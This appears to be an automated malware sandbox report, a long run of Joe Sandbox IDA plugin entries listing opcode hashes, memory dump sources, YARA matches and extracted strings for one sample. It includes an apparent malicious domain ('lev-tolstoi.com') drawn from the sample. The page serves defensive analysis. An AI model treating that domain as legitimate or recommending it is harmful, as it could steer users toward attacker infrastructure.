                                                                                                                                                                                                                                                        • Instruction ID: ef815690421230d978b5567e448b5e7a71f91f0ebb5a0f0f34302f64b4d36d8c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3812C5160569005EB2CDF3888A773BB9D69F84308F2991BEC955CFA67E93CC502874E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                        • Instruction ID: 79c13e3853801c87cfbe3228b3cf0cd0e59d880e24c31692bd3642d34f4b62b4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0314DB6910609DFEB10CF99C884BADBBF9FF48324F15404AD441A7312D775EA45CBA4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "51s$9YB
                                                                                                                                                                                                                                                        • API String ID: 0-2722061943
                                                                                                                                                                                                                                                        • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                        • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !@$,
                                                                                                                                                                                                                                                        • API String ID: 0-2321553346
                                                                                                                                                                                                                                                        • Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                        • Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !@$,
                                                                                                                                                                                                                                                        • API String ID: 0-2321553346
                                                                                                                                                                                                                                                        • Opcode ID: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                        • Instruction ID: 1409ff1c89eec9639fa30a517ddd8d1c7b53f6d556d7cdf5191d0e738cae31b4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F4217B1E042448FDB04CF78C8853EEBFF1AF46311F198269D895A7392D779894ACB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction ID: 5e79cb6a72c2493b070d6648864c3f7eaf829ac9fe49937b0c7855b38eb6f48e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EF1DDB054D3D18EE335CF659490BEBBFE1AB92314F184AADC8D95B642C735090ACB93
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                        • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                        • Instruction ID: 9876424f4d1e1a24ea825129a784b44ad5c7c6f9f7859c65ec0973722cd958ea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AED13A3151C3D08ED7358B3984507EBBBE19FA3315F18896DD8D98B382C7B9890AC752
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                        • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                        • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: R2B$6B
                                                                                                                                                                                                                                                        • API String ID: 0-20043878
                                                                                                                                                                                                                                                        • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                        • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: XG$|}
                                                                                                                                                                                                                                                        • API String ID: 0-1014376750
                                                                                                                                                                                                                                                        • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                        • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: XG$|}
                                                                                                                                                                                                                                                        • API String ID: 0-1014376750
                                                                                                                                                                                                                                                        • Opcode ID: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                        • Instruction ID: 9713a0049a972a71cfbc19781e9b361646419870219b5e5644bfda2243854fa6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05D114B15083408BD724DF14C8927ABB7F1FFD2316F49895CE9968B3A1E7B98805CB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: )$IEND
                                                                                                                                                                                                                                                        • API String ID: 0-707183367
                                                                                                                                                                                                                                                        • Opcode ID: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                                                                                                                                                                                                                                        • Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: )$IEND
                                                                                                                                                                                                                                                        • API String ID: 0-707183367
                                                                                                                                                                                                                                                        • Opcode ID: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                                                                                                                                                                                                                                        • Instruction ID: 857b4c8065c9131f934eabf9d9323b6650cf8a7ed1b4aedb7b78b07f766962e1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89D19EB1508344DFE724CF14C845B9BBBE4AF94304F14892DF9999B382D779E908CB92
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: i$r}A
                                                                                                                                                                                                                                                        • API String ID: 2994545307-2976846027
                                                                                                                                                                                                                                                        • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                                                                                                                                                                        • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: d$d
                                                                                                                                                                                                                                                        • API String ID: 0-195624457
                                                                                                                                                                                                                                                        • Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                                                                                                                                                                        • Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: P<?$P<?
                                                                                                                                                                                                                                                        • API String ID: 0-3449142988
                                                                                                                                                                                                                                                        • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                                                                                                                                                                        • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                                                                                        • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                        • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                                                                                                                                                                        • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                        • Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                        • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                        • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                        • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: jk
                                                                                                                                                                                                                                                        • API String ID: 0-78326018
                                                                                                                                                                                                                                                        • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                        • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
